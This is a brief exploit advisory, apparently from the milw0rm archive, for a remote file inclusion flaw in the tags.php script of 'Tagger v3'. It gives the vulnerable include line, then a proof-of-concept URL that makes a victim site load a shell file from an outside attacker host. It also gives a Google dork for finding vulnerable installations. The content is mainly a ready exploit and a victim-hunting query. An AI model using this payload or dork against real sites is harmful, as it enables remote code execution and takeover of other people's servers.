23 lines
No EOL
369 B
Text
23 lines
No EOL
369 B
Text
Tagger v3 <= BBCodeFile Remote file inclusion
|
|
|
|
Discovered by : Morgan
|
|
|
|
Error in : tags.php
|
|
include($BBCodeFile);
|
|
|
|
Vendor Website: http://www.venturenine.com
|
|
|
|
PoC:
|
|
http://victim-site.com/tags.php?BBCodeFile=http://ehmorgan.net/shell.dat?
|
|
|
|
Google dork:
|
|
|
|
intitle:"Tagger LE" inurl:tags.php
|
|
|
|
Visit us :
|
|
|
|
www.ehmorgan.net
|
|
irc.gigachat.net
|
|
#Morgan
|
|
|
|
# milw0rm.com [2006-08-09] |